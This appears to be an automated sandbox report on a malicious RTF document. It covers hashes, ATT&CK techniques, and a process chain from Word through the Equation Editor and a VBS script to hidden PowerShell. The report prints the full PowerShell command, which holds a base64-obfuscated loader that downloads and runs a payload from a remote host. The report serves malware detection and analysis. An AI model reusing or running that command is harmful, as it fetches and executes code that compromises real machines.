60415ee85c74fc9666c2445a4a36db0dbab76a25de01af187cb96ee83f492100

General

Target

weneedgreatthingsalwaystogetmehairdrandtgreatthingsonheretoheighhmangotreeonhere_____________bettermangotreeonheretoget.rtf
Size

77KB
MD5

4b9305dcc211e64941a71120617c8983
SHA1

53b7292c31055f3e50e555542ce517bd0237b1a0
SHA256

60415ee85c74fc9666c2445a4a36db0dbab76a25de01af187cb96ee83f492100
SHA512

7d84b0c4c8bb2217f4072032f1179de1d116ca10d7842c77740b56a0671400c5032986ba5967d5b8836bd25e818ba06487531f090a9a6d3ee7dbbd68e4370923
SSDEEP

384:TpTZwOjBKrUqMtpOrxdc5gEp2wZTNvK3iH5kreVI9RIebbusxSMwq:TpVwOjkrUKYgkpKSHpVIP9bbusxSc

Score

8^/10

discovery execution

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

EQNEDT32.EXE

flow pid process

4 2480 EQNEDT32.EXE
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

2724 powershell.exe
2264 powershell.exe

flow	pid	process
4	2480	EQNEDT32.EXE

pid	process
2724	powershell.exe
2264	powershell.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

powershell.exepowershell.exeWINWORD.EXEEQNEDT32.EXEWScript.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EQNEDT32.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Office loads VBA resources, possible macro or embedded object present
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
exploit

Exploitation for Client Execution
T1203

Processes:

EQNEDT32.EXE

pid process

2480 EQNEDT32.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

2288 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

2724 powershell.exe
2264 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2724 powershell.exe
Token: SeDebugPrivilege 2264 powershell.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

2288 WINWORD.EXE
2288 WINWORD.EXE

pid	process
2480	EQNEDT32.EXE

pid	process
2288	WINWORD.EXE

pid	process
2724	powershell.exe
2264	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2724	powershell.exe
Token: SeDebugPrivilege	2264	powershell.exe

pid	process
2288	WINWORD.EXE
2288	WINWORD.EXE

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

EQNEDT32.EXEWScript.exepowershell.exeWINWORD.EXE

description	pid	process	target process
PID 2480 wrote to memory of 2712	2480	EQNEDT32.EXE	WScript.exe
PID 2480 wrote to memory of 2712	2480	EQNEDT32.EXE	WScript.exe
PID 2480 wrote to memory of 2712	2480	EQNEDT32.EXE	WScript.exe
PID 2480 wrote to memory of 2712	2480	EQNEDT32.EXE	WScript.exe
PID 2712 wrote to memory of 2724	2712	WScript.exe	powershell.exe
PID 2712 wrote to memory of 2724	2712	WScript.exe	powershell.exe
PID 2712 wrote to memory of 2724	2712	WScript.exe	powershell.exe
PID 2712 wrote to memory of 2724	2712	WScript.exe	powershell.exe
PID 2724 wrote to memory of 2264	2724	powershell.exe	powershell.exe
PID 2724 wrote to memory of 2264	2724	powershell.exe	powershell.exe
PID 2724 wrote to memory of 2264	2724	powershell.exe	powershell.exe
PID 2724 wrote to memory of 2264	2724	powershell.exe	powershell.exe
PID 2288 wrote to memory of 272	2288	WINWORD.EXE	splwow64.exe
PID 2288 wrote to memory of 272	2288	WINWORD.EXE	splwow64.exe
PID 2288 wrote to memory of 272	2288	WINWORD.EXE	splwow64.exe
PID 2288 wrote to memory of 272	2288	WINWORD.EXE	splwow64.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\weneedgreatthingsalwaystogetmehairdrandtgreatthingsonheretoheighhmangotreeonhere_____________bettermangotreeonheretoget.rtf"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2288

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:272

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2480

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\roseflowergetmeforgirlshair.vBS"
2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2712

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JABsAGkAbgBrACAAPQAgACcAaAB0AHQAcAA6AC8ALwBzAGUAcgB2AGkAZABvAHIAdwBpAG4AZABvAHcAcwAuAGQAdQBjAGsAZABuAHMALgBvAHIAZwAvAEYAaQBsAGUAcwAvAHYAYgBzAC4AagBwAGUAZwAnADsAIAAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgAHQAcgB5ACAAewAgACQAZABvAHcAbgBsAG8AYQBkAGUAZABEAGEAdABhACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAbABpAG4AawApACAAfQAgAGMAYQB0AGMAaAAgAHsAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAJwBGAGEAaQBsAGUAZAAgAFQAbwAgAGQAbwB3AG4AbABvAGEAZAAgAGQAYQB0AGEAIABmAHIAbwBtACAAJABsAGkAbgBrACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQAOwAgAGUAeABpAHQAIAB9ADsAIABpAGYAIAAoACQAZABvAHcAbgBsAG8AYQBkAGUAZABEAGEAdABhACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIAAkAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAZABvAHcAbgBsAG8AYQBkAGUAZABEAGEAdABhACkAOwAgACQAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAgACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAgACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAgAGkAZgAgACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAKQAgAHsAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAkAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAIAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAgACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAIAAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAIAAkAHQAeQBwAGUAIAA9ACAAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBkAG4AbABpAGIALgBJAE8ALgBIAG8AbQBlACcAKQA7ACAAJABtAGUAdABoAG8AZAAgAD0AIAAkAHQAeQBwAGUALgBHAGUAdABNAGUAdABoAG8AZAAoACcAVgBBAEkAJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAdAB4AHQALgBSAFYAUgBTAC8ANQAwADgALwAxADUALgA2ADYALgA5ADcALgA1ADQALwAvADoAcAB0AHQAaAAnACAALAAgACcAZABlAHMAYQB0AGkAdgBhAGQAbwAnACAALAAgACcAZABlAHMAYQB0AGkAdgBhAGQAbwAnACAALAAgACcAZABlAHMAYQB0AGkAdgBhAGQAbwAnACwAJwBSAGUAZwBBAHMAbQAnACwAJwBkAGUAcwBhAHQAaQB2AGEAZABvACcAKQApACAAfQAgAH0A';$OWjuxD = [system.Text.encoding ]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2724

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2264

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Exploitation for Client Execution

1

T1203

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
7cf6980e2d452b909e5dd9c55e37c04b

SHA1
b164fd26bf2b73127b83aea72a063e85af928cb9

SHA256
f9e5452a8f0314e798b73c877a52086bc18e652518d74ba227997370fd423b16

SHA512
62d5f211282cd8c8364372a4afee49b6be7f178cca8952f3c7c6ee8e29987acdabf7f94d0e698c2e830dac5cd3493a36957d015d5136fd1e62db3355f4491786

Download Submit
C:\Users\Admin\AppData\Roaming\roseflowergetmeforgirlshair.vBS
Filesize
234KB

MD5
935dee250a117207ad585b612947fa27

SHA1
c6ae8ce6d985d1be08adf7f14ef2ce0ffbc1cd62

SHA256
1d2f072eaaa8fd2f52c3dfaa1a888b614ed4ea21ecd4daff2f959d81f789a671

SHA512
b2f7144e0748a6fd1b423ba9fa2b694011d1591c966faae54b8a89409c686938bed0550b7a9bb84bdd48ac85483204ee81fb0b2a319c748a41ceb4b5e14170e7

Download Submit
memory/2288-0-0x000000002F071000-0x000000002F072000-memory.dmp

Filesize
4KB

Download
memory/2288-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2288-2-0x000000007112D000-0x0000000071138000-memory.dmp

Filesize
44KB

Download
memory/2288-23-0x000000007112D000-0x0000000071138000-memory.dmp

Filesize
44KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads